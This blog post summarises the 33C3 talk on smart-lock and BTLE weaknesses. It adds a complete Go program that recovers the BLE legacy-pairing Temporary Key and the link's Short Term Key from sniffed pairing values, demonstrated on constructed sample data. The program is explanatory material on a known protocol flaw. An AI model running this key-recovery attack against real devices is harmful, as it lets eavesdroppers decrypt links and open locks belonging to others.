Summary of “Lockpicking in the IoT” at 33C3

“Lockpicking in the IoT, …or why adding BTLE to a device sometimes isn’t smart at all” by Ray was one of my favourite talks, as it beautifully showed many different attack vectors and also gave a nice guide for getting started in this area.

It impressed me how carelessly vendors and startups handled hardware and software security in “smart” devices, as it seems that their devices were more or less easy to own. In his talk Ray pointed out physical AND implementation weaknesses that remained even after he reported them to the vendors.
The most prominent example he gave was opening a “Masterlock” by spinning a magnet on the lock itself.

Most interesting for beginners like me was the software part, where he showed which tools are good to start with and how to use them against your own BTLE gadgets. I found it very important that he also pointed out that BTLE 4.0/4.1 provides no, or at best very weak, protection against sniffing and decryption, and that it is better to wait for BTLE 4.2, as it implements better security measures.
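To make the “very weak against sniffing” point concrete, here is an added example that is not from the talk or from this post: it works through BLE legacy pairing (the 4.0/4.1 method that LE Secure Connections replaced in 4.2) in Go using only the standard library. Both peers compute a confirm value c1 over a Temporary Key (TK) and send it in the clear, then reveal the random values; with Just Works the TK is simply 0, with Passkey Entry it is a six-digit number. A passive sniffer that captured the Pairing Request/Response, both addresses, the confirm and random values therefore needs at most one million AES guesses to recover the TK, and from it the Short Term Key (STK) that encrypts the link. The sample pairing parameters, random values and the passkey 123456 are constructed for the demo; the code uses the spec's big-endian integer notation for all 128-bit values and assumes the caller has already reversed the on-air little-endian byte order.

```go
package main

import (
	"crypto/aes"
	"encoding/binary"
	"fmt"
)

// Block is a 128-bit value in the specification's big-endian notation
// (most significant octet first). Assumption: on-air little-endian bytes
// have already been reversed into this form by the sniffer.
type Block [16]byte

// e is the Bluetooth security function e: one AES-128 block encryption.
func e(key, plaintext Block) Block {
	c, err := aes.NewCipher(key[:])
	if err != nil {
		panic(err) // impossible for a 16-byte key
	}
	var out Block
	c.Encrypt(out[:], plaintext[:])
	return out
}

func xor(a, b Block) Block {
	var out Block
	for i := range a {
		out[i] = a[i] ^ b[i]
	}
	return out
}

// tkKey expands the Temporary Key into the 128-bit key k. Just Works uses
// TK = 0, Passkey Entry the six-digit passkey: at most 1,000,000 candidates.
func tkKey(tk uint32) Block {
	var k Block
	binary.BigEndian.PutUint32(k[12:], tk)
	return k
}

// buildP1 assembles p1 = pres || preq || rat' || iat' (7+7+1+1 octets).
func buildP1(pres, preq [7]byte, rat, iat byte) Block {
	var p Block
	copy(p[0:7], pres[:])
	copy(p[7:14], preq[:])
	p[14] = rat
	p[15] = iat
	return p
}

// buildP2 assembles p2 = 4 zero octets || ia || ra.
func buildP2(ia, ra [6]byte) Block {
	var p Block
	copy(p[4:10], ia[:])
	copy(p[10:16], ra[:])
	return p
}

// c1 is the confirm value function e(k, e(k, r XOR p1) XOR p2). It is sent
// before r is revealed, so a sniffer later holds everything except k.
func c1(k, r, p1, p2 Block) Block {
	return e(k, xor(e(k, xor(r, p1)), p2))
}

// bruteForceTK tries every possible TK against one sniffed confirm/random
// pair. Just Works (TK = 0) falls on the very first iteration.
func bruteForceTK(confirm, r, p1, p2 Block) (uint32, bool) {
	for tk := uint32(0); tk < 1000000; tk++ {
		if c1(tkKey(tk), r, p1, p2) == confirm {
			return tk, true
		}
	}
	return 0, false
}

// s1 derives STK = s1(TK, Srand, Mrand): AES over the low 64 bits of Srand
// followed by the low 64 bits of Mrand.
func s1(k, srand, mrand Block) Block {
	var r Block
	copy(r[0:8], srand[8:16])
	copy(r[8:16], mrand[8:16])
	return e(k, r)
}

// Demo runs the attack end to end on constructed sample data and returns the
// recovered TK and whether the attacker's STK equals the peers' STK.
func Demo() (uint32, bool) {
	// Constructed sample pairing parameters (spec notation, not on-air order).
	preq := [7]byte{0x07, 0x07, 0x10, 0x00, 0x00, 0x01, 0x01}
	pres := [7]byte{0x05, 0x00, 0x08, 0x00, 0x00, 0x03, 0x02}
	ia := [6]byte{0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6}
	ra := [6]byte{0xB1, 0xB2, 0xB3, 0xB4, 0xB5, 0xB6}
	p1 := buildP1(pres, preq, 0x00, 0x01)
	p2 := buildP2(ia, ra)
	const passkey = 123456 // constructed: the digits shown on the display
	mrand := Block{0x57, 0x83, 0xD5, 0x21, 0x56, 0xAD, 0x6F, 0x0E, 0x63, 0x88, 0x27, 0x4E, 0xC6, 0x70, 0x2E, 0xE0}
	srand := Block{0x4C, 0x2A, 0x11, 0x90, 0x3E, 0x7B, 0x08, 0xF5, 0xD1, 0x66, 0x9A, 0x02, 0xB7, 0x3C, 0xEE, 0x49}

	// Legitimate peers: confirm value sent in the clear, STK kept secret.
	mconfirm := c1(tkKey(passkey), mrand, p1, p2)
	stk := s1(tkKey(passkey), srand, mrand)

	// Eavesdropper: only sniffed values go in, the link key comes out.
	tk, ok := bruteForceTK(mconfirm, mrand, p1, p2)
	if !ok {
		return 0, false
	}
	return tk, s1(tkKey(tk), srand, mrand) == stk
}

func main() {
	tk, ok := Demo()
	fmt.Printf("recovered TK %06d, derived STK matches peers: %v\n", tk, ok)
}
```

The search finishes in well under a second on a laptop, which is the whole point: no amount of app-side hardening helps when the key that protects the link is derived from six digits (or from nothing at all). LE Secure Connections in 4.2 replaces this exchange with an ECDH key agreement, so a purely passive sniffer no longer learns enough to derive the key.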

Another good point was the reminder to vendors that obfuscating their apps to protect against reverse engineering isn’t a good idea either, because severe bugs will then never be found, or only much later.

So all in all it was a very interesting talk that combined hardware hacking, research and reverse engineering pretty well and gives beginners a good first impression of the field.

Thank you for reading and see you at TROOPERS17!


Other Links: